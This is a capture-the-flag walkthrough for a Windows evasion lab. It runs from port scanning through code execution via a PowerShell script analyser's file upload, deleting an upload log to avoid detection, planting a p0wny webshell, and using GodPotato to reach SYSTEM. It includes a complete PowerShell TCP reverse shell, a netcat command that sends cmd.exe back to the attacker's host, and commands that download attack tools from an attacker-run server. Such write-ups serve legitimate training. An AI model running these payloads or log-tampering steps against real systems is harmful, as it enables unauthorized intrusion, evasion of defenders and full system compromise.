🥷Stealth (Windows)
Use your evasion skills to pwn a Windows target with an updated defence mechanism.
Network Enumeration
Nmap
sudo nmap -sS --min-rate 5000 -p- --open -n -Pn 10.10.131.99 -oN puertos
nmap -sCV -p139,445,3389,5985,7680,8000,8080,8443,47001,49664,49665,49666,49667,49668,49670,49672 10.10.131.99 -oN nmapResultado
PORT      STATE    SERVICE       VERSION
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
3389/tcp  open     ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HOSTEVASION
|   NetBIOS_Domain_Name: HOSTEVASION
|   NetBIOS_Computer_Name: HOSTEVASION
|   DNS_Domain_Name: HostEvasion
|   DNS_Computer_Name: HostEvasion
|   Product_Version: 10.0.17763
|_  System_Time: 2025-08-03T11:00:29+00:00
| ssl-cert: Subject: commonName=HostEvasion
| Not valid before: 2025-08-02T10:53:10
|_Not valid after:  2026-02-01T10:53:10
|_ssl-date: 2025-08-03T11:01:08+00:00; +1s from scanner time.
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  filtered pando-pub
8000/tcp  open     http          PHP cli server 5.5 or later
|_http-title: 404 Not Found
8080/tcp  open     http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
8443/tcp  open     ssl/http      Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-title: PowerShell Script Analyser
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49668/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     msrpc         Microsoft Windows RPC
49672/tcp open     msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-08-03T11:00:29
|_  start_date: N/A
Windows system
SMB/RPC Enumeration - Null Session
smbclient -L //10.10.131.99 -N
Access denied
rpcclient -U "" 10.10.131.99 -N
Access denied
Web Service Enumeration
http://10.10.131.99:8000/
Not Found The requested resource / was not found on this server.
http://10.10.131.99:8080/
PowerShell Script Analyser
Please upload any .ps1 PowerShell script to see if it is malicious or not (Dev Mode). The tool is in dev-mode and only allow .ps1 format at this stage.
A PowerShell reverse shell inside a "malicious" .ps1 file? If the analyser runs what it receives, the upload itself is the execution primitive.
Exploitation: File Upload to RCE
Interactive PowerShell Reverse Shell
nc -lvnp <port>
Upload file > automatic execution
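The payload the analyser ends up executing, written out as an added example (it is not the writeup's own upload): a minimal PowerShell TCP reverse shell that connects back to the nc listener and relays commands. The listener host and port are assumptions, substitute the attacker's address and the port passed to nc -lvnp. The room title warns of an updated defence; the stock form of this pattern is signatured by Defender, so the upload is expected to be reworked before it runs on the target.

```powershell
# Added example (not the writeup's upload): a minimal PowerShell TCP reverse shell.
# $ListenerHost and $ListenerPort are assumptions: point them at the nc -lvnp <port> listener.
$ListenerHost = '10.9.0.1'
$ListenerPort = 4444

$client = New-Object System.Net.Sockets.TcpClient($ListenerHost, $ListenerPort)
$stream = $client.GetStream()
$enc    = [System.Text.Encoding]::ASCII
[byte[]]$buffer = New-Object byte[] 65536

function Send-Text([string]$text) {
    # Functions read $stream/$enc from the enclosing script scope (PowerShell dynamic scoping).
    $bytes = $enc.GetBytes($text)
    $stream.Write($bytes, 0, $bytes.Length)
    $stream.Flush()
}

# First prompt carries the user and cwd so the operator sees which context the analyser runs the script in.
Send-Text ("{0} PS {1}> " -f (whoami), (Get-Location).Path)

try {
    while (($read = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
        $command = $enc.GetString($buffer, 0, $read).Trim()
        if ($command -eq 'exit') { break }
        try {
            # 2>&1 folds non-terminating errors into the output; Out-String yields one text block to send back.
            $result = Invoke-Expression $command 2>&1 | Out-String
        } catch {
            $result = $_.Exception.Message + "`n"
        }
        Send-Text ($result + ("PS {0}> " -f (Get-Location).Path))
    }
} finally {
    $client.Close()
}
```

Save it as a .ps1, start nc -lvnp on the chosen port, and upload; if the analyser executes uploads, the prompt arrives in the listener as the account running the analyser (here hostevasion\evader).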
Initial Foothold
Shell: hostevasion\evader
Post-Intrusion Enumeration
C:\Users\evader\desktop\encodedflag
echo "encodedflag" | base64 -d
You can get the flag by visiting the link http://<IP_OF_THIS_PC>:8000/asdasdadasdjakjdnsdfsdfs.php
http://10.10.131.99:8000/asdasdadasdjakjdnsdfsdfs.php
Hey, seems like you have uploaded invalid file. Blue team has been alerted. Hint: Maybe removing the logs files for file uploads can help?
Getting the User Flag
C:\Users\evader\documents\task\file.ps1
$FolderPath = "C:\xampp\htdocs\uploads\"
C:\xampp\htdocs\uploads\
log.txt
rm C:\xampp\htdocs\uploads\log.txt
Once the upload log is gone, the page at http://10.10.131.99:8000/asdasdadasdjakjdnsdfsdfs.php no longer reports the "invalid file" alert and returns the flag.
Attack Surface Enumeration
whoami /all
builtin\Users
No useful privileges in the evader token.
cd C:\xampp\htdocs\
icacls .
builtin\Users: (F)
Apache under XAMPP is installed as a Windows service. Every process the Service Control Manager starts carries the SERVICE group SID (S-1-5-6) in its token, and the default "Impersonate a client after authentication" policy grants SeImpersonatePrivilege to that group (together with Administrators, LOCAL SERVICE and NETWORK SERVICE). When a webshell is dropped into the application's web root and requested over HTTP, the PHP interpreter runs inside the Apache worker process and inherits that token, so the webshell holds SeImpersonatePrivilege even though the evader session obtained through the .ps1 upload did not. The service account is not LocalSystem here: if it were, the webshell would already be SYSTEM and the escalation below would be unnecessary.
Deploying p0wny-shell
python3 -m http.server
cd C:\xampp\htdocs\
wget http://<ip-a>/pony.php -OutFile pony.php
webshell: http://10.10.131.99:8080/pony.php
In PowerShell wget is an alias for Invoke-WebRequest, so the destination has to be given with -OutFile; a bare second argument is rejected as an unbound positional parameter.
whoami /priv
New privilege in the service context
Privilege Name           Description                                State
=======================  =========================================  ========
SeImpersonatePrivilege   Impersonate a client after authentication  Enabled
Privilege Escalation - SeImpersonatePrivilege
Escalation with RogueWinRM
winrm enumerate winrm/config/listener
WinRM is running
Status   Name               DisplayName
------   ----               -----------
Running  WinRM              Windows Remote Management (WS-Manag...
Not vulnerable to RogueWinRM: the technique needs the WinRM service stopped so that a rogue listener can bind TCP 5985 and catch the SYSTEM connection the BITS service makes on start-up. Here WinRM is already running and owns the port (5985 was open in the scan), so a potato is the way forward.
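The two facts the escalation decision rests on (a service token carrying SeImpersonatePrivilege, and whether WinRM already owns TCP 5985) can be checked in one go from the webshell. This is an added example, not part of the writeup; it uses only built-in cmdlets and the well-known SERVICE SID, and the decision thresholds are the editor's.

```powershell
# Added example (not from the writeup): triage the current token and the WinRM state
# to decide between RogueWinRM and a potato. Run inside the webshell's PowerShell context.

function Get-TokenContext {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # S-1-5-6 is the well-known SERVICE SID. The SCM adds it to every service-started
    # process, and the default policy grants SeImpersonatePrivilege to that group.
    $hasServiceSid = [bool]($id.Groups | Where-Object { $_.Value -eq 'S-1-5-6' })
    # whoami /priv prints one line per privilege present in the token, enabled or disabled.
    $priv = whoami /priv
    [pscustomobject]@{
        User            = $id.Name
        HasServiceSid   = $hasServiceSid
        SeImpersonate   = [bool]($priv -match '^SeImpersonatePrivilege')
        SeAssignPrimary = [bool]($priv -match '^SeAssignPrimaryTokenPrivilege')
    }
}

function Get-WinRMState {
    # RogueWinRM binds TCP 5985 itself and waits for BITS to connect as SYSTEM.
    # A running WinRM service already holds the port, which closes that window.
    $svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
    $listening = [bool](Get-NetTCPConnection -LocalPort 5985 -State Listen -ErrorAction SilentlyContinue)
    [pscustomobject]@{
        ServiceStatus  = if ($svc) { [string]$svc.Status } else { 'NotInstalled' }
        PortListening  = $listening
        RogueWinRMPath = (-not $listening) -and (($null -eq $svc) -or ($svc.Status -ne 'Running'))
    }
}

function Select-EscalationPath {
    $tok = Get-TokenContext
    $win = Get-WinRMState
    $tok | Format-List | Out-String | Write-Host
    $win | Format-List | Out-String | Write-Host
    if (-not ($tok.SeImpersonate -or $tok.SeAssignPrimary)) {
        return 'No impersonation privilege in this token: neither RogueWinRM nor a potato applies.'
    }
    if ($win.RogueWinRMPath) {
        return 'WinRM stopped and 5985 free: RogueWinRM is viable.'
    }
    return 'SeImpersonate present but WinRM owns 5985: use a potato (GodPotato) instead.'
}

Select-EscalationPath
```

On this target the output is expected to show HasServiceSid and SeImpersonate true with WinRM Running and PortListening true, which is exactly the branch that sends you to GodPotato below.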
Escalation with GodPotato
Potato privilege escalation is usually used when we obtain WEB/database privileges. We can elevate a service user with low privileges to “NT AUTHORITY\SYSTEM” privileges.
python3 -m http.server
cd C:\xampp\htdocs\
wget http://<ip-a>/potato.exe -OutFile potato.exe
webshell: http://10.10.131.99:8080/pony.php
potato.exe -cmd "nc -t -e C:\Windows\System32\cmd.exe <ip-a> <port>"
System Compromise
Shell: NT AUTHORITY\SYSTEM